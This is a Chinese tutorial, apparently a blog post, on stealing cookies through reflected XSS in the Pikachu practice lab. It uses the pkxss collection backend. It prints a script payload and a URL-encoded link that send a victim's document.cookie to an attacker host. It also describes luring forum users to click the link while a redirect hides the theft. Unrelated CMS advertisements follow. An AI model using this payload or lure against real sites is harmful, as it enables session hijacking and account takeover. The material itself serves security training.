3-5通过XSS获取cookie以及XSS后台管理系统的使用

XSS漏洞测试:cookie获取和钓鱼攻击演示

 XSS漏洞测试:cookie的窃取和利用

同时讲到get型xss的利用,post型xss的利用

 XSS漏洞测试:钓鱼攻击

 XSS漏洞测试:xss获取用户键盘记录

让大家更好的理解xss的危害以及原理

案例1:xss如何获取cookie?

GET型XSS利用:cookie获取

在这里插入图片描述

pkxss管理后台使用介绍

在源码包里面,有一个pkxss,我们可以把这个目录,单独的放在某个目录下面,这个东西其实是一个可以独立使用的后台,我们可以单独的把他放在站点目录下面,去访问它

在这里插入图片描述

首先打开pikachu的网站,在管理工具下面,有一个xss后台,在第一次使用的时候,需要安装一下,在安装之前,我们要保证,在我们的代码inc文件夹里面,config.inc.php里面

在这里插入图片描述

你要确保你的账号密码是对的,我们来登录看一下

在这里插入图片描述

我们点一下cookie搜集

在这里插入图片描述

这个地方是结果展示页面,默认情况下,这里没有任何数据

cookie获取后端代码分析

我们在pkxss目录下面,有一个xcookie模块,在这个下面,有一个cookie.php,实际上,所有的数据都是发送到这里来

在这里插入图片描述

通过get方式,去获取有没有发送cookie给我,如果有就把它记录下来,同时把请求里面的referer、useragent读下来,然后把它插入到数据库里面去

header("Location:http://192.168.42.236/pikachu/index.php");

在后面还做了一个重定向,在实际的应用场景下面,我们发一个链接给别人,别人点了一下,不可能会弹出一个空白页面,所以说,最终我们得把它重定向到可信的页面上面去,当他点完之后,察觉不到这个链接做了什么坏事,所以说,我们一般要把它重定向到它所访问的网站首页,或者是,某个其它的页面,但是在我们的实验里面,这个地方,会重定向到存在漏洞的网站首页

pkxss_cookie_result.php文件是做查询的页面,就是我们刚看到的,后台的php文件

在这里插入图片描述

这个文件是要做登录的,就是说只有登录的人,才能去访问,获取xss的结果,这个文件是直接把数据库里面的cookie信息,给展示出来

接下来,我们演示一下get型xss的流程,我们把字符长限制给去掉

我在这里准备了一段js的代码

pkxss后台:
http://192.168.1.15/pkxss/pkxss_login.php

<script>document.location = 'http://192.168.1.15/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

http://192.168.1.4/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2F192.168.1.15%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E&submit=submit



他会通过document.location这个实例,去做一个重定向,一旦他访问这个页面,js就会去访问1.15,我们的xss后台,然后我们访问的时候,随便把cookie给带过去,通过document.cookie这个实例去获取本地的cookie,那这样,就形成了一个完整的get请求,我们可以把这段复制一下

<script>document.location = 'http://192.168.42.236/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

放到输入框里面,点提交

在这里插入图片描述

他返回到了首页,js在本地执行后,就会去返回后台,理论上,这个时候,我们已经获取到cookie了,把这个页面刷新一下

在这里插入图片描述

这个地方就会多出一道记录

在实际的场景中,我们要把那段url在传参的时候,做一个编码,把这段url复制好,直接发送给用户

http://192.168.1.4/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2F192.168.1.15%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E&submit=submit

比如说,这是个比较重要的论坛,我们跟用户聊天的时候,告诉他这是个活动页面,欺骗用户去点击,一旦用户在这个浏览器里面访问了这个链接,他就会跳到首页,当然,也可以跳到其它的页面,主要的目的是为了掩盖我们背后的行为

这就是get型请求下面的反射型xss的利用

  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络信息飞速发展和网络应用的深化,网络版的投票评选在活动中的方便性和重要性,目前智睿投票评选系统专注定位于投票评选行业的量身开发,打造行业的领先服务评选品牌,系统整合单选/多选一体化功能,并适合图文评选,适合用于大型媒体单位、机关单位、院校机构、集团公司、门户网站可用于城市评选、美景评选、优秀人物评选、活动评选,事迹评选。 授权版:一健单,多选切换,动态IP防刷,CC防注,IP自动校验,时间防注,自动防刷锁IP,COOKIE防注,SQL防注,时间控制,IP封锁,最大有效票数控制,间隔控制,外链控制,票数控制等 管理后台登陆: admin/admin_login.asp 帐号:admin 管理密码:123456 认证码: zhirui 配置文件/include/config.asp 数据文件/include/conn.asp 授权 Internet 匿名用户写权限|伦理电影 www.ixdy.com 1,XP NTFS格式 右击文件夹属性没有安全选项,工具--文件夹选项--查看--取消“使用简单文件共享” 2,选择你的下载的系统解压的文件夹,右健-属性,将只读权限去除,如文件夹名称为:zhirui 3,授权 Internet 匿名用户写权限,如文件夹名称为:zhirui zhirui 的文件目录=>属性=>安全=>添加=>高级=>立即查找,选中在 IIS 中“启用匿名用户”; 赋予其修改文件夹及文件的权限,并将文件夹“只读”属性去掉!(默认 Internet 匿名用户叫:IUSR_???,“???”可能为本机登陆的用户名) 运行环境:Asp + IIs6 + Access + MSSQL + Windows2003 程序构造: ASP + Access AJAX + XML + DIV + CSS + table + HTML 20140701更新: 1、安全防注XSS加载 2、管理评选列表调整
WellCMS X是一款开源、倾向移动端的轻量级CMS,高负载CMS,亿万级CMS,是大数据量、高并发访问网站最佳选择的轻CMS内容管理系统。 WellCMS具有安全、高效、稳定、速度快、负载超强的特点,同时在SEO方面做了大量优化。 WellCMS 2.0 只有22个表,运行速度非常快,处理单次请求在 0.01 秒级别,支持各种NoSQL操作。 分布式服务器设计,每张表都可创建单独的DB服务器群和CACHE服务器(群),单表可承受高达亿级以上的数据,方便部署和维护,是一个二次开发非常好的基石。 WellCMS更新日志: beta2版修复了已知错误: 1.修复后台灌水后删除数据,造成用户数据错误; 2.修复在线统计多次分配sid问题; 3.全压缩模式下附件不显示问题; 4.修复了免登陆采集入库接口密码错误; 5.增加用户数据主题数据只显示100页; 6.增加过滤不在首页显示内容的版块,后台版块设置里有选项,勾选是否在首页显示; 暂时就发现这些小bug WellCMS 2.0 具备了1.0的功能,就不在写了,以下是1.0没有的功能。 修复自动生成缩略图不居中; 修复https图片本地保存问题; 附件分离重写,自动进行本地、云储存、图床切换 增加单页,及单页排序 增加友情链接 增加导航站外链接 增加主题风格切换 增加模板绑定ID,绑定PC端、pad端、移动端自动搜索模板,模板风格都在/view/template/目录里,制作模板,首先复制一份官方的模板到demo目录,后台安装风格后,可以开始修改样式了,如list.htm为PC端,Pad端pad.list.htm,手机端m.list.htm,那么绑定版块则为1_list.htm、1_pad.list.htm、1_m.list.htm,随后详细介绍;(模板目录命名支持英文、下划线) 修改后台内容写作页面,更适合移动端 版块创建重新规划 属性更改为定制 部分重要函数重写 业务逻辑重新梳理,统一调用,增加性能 数据表多项调整 前台用户中心重新规划 前台页面进行微调 修改主题缩略图名称 增加图片无需本地化生成缩略图 增加支持微信公众号文章图片本地化 增加支持微信公众号文章图片生成做略图 增加子域名同时登录退出功能 增加cookie只有https才能获取功能,开启后更安全,默认关闭 增加自定义cookie生存期 增加https的安全传输方式,有效防止 XSS 增加api开关,默认关闭 增加前台所有页面赖加载 增加免登陆采集入库
先锋内容管理系统 v1.5 更新内容: 新增 全站搜索 新增 手机注册,验证码发送 新增 广告模块 修复 附件关联BUG 修正 添加网站名称字段,区别网站名称和标题   先锋CMS是深圳市卓越先锋科技有限公司自主开发的一套内容管理系统,拥有独立著作权。   1、智能人性、简单易用、安全高效:先锋CMS(后面简称XFCMS)采用PHP5 MYSQL做为技术基础进行开发。XFCMS采用OOP(面向对象)方式进行基础运行框架搭建,模块化开发方式做为功能开发形式,采用b/s三层结构开发的内容管理系统,安全特性和功能对各种攻击方式进行全方位的防范。   2、高负载功能:一个网站负载功能在网站访问量或内容量巨大时至关重要。XFCMS提供了多种的缓存方式,包括数据缓存、静态缓存和查询缓存等,支持包括文件方式、APC、Db、Memcache、Shmop、Sqlite、Redis、Eaccelerator和Xcache在内的动态数据缓存类型,以及可定制的静态缓存规则,并提供了快捷方法进行存取操作。并且支持分布式数据库部署,包括主从式数据库的读写分离。   3、样式和内容分离:系统主体框架div css结构,遵循国际最新W3C网页设计标准,兼容IE系列、火狐等主流浏览器,内容和样式分离让网站风格可以轻松修改和更换,而不会导致内容和结构的破坏。   4、周密的安全策略和攻击防护:表单令牌机制、字段类型验证、输入过滤、上传安全过滤、防止XSS攻击和目录安全保护等功能,对SQL参数进行敏感字符过滤、对密码、cookie进行了不可逆加密处理,数据库备份功能、对管理员权限的自由分配等,在方方面面保证了系统的安全和稳定。   5、多端一体化:提供Native App模式客户端的移动客户端,包含iOS和Android平台。在移动互联网时代,“PC 移动”一体化技术解决方案,是必需品,移动客户端是每个网站的标配。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值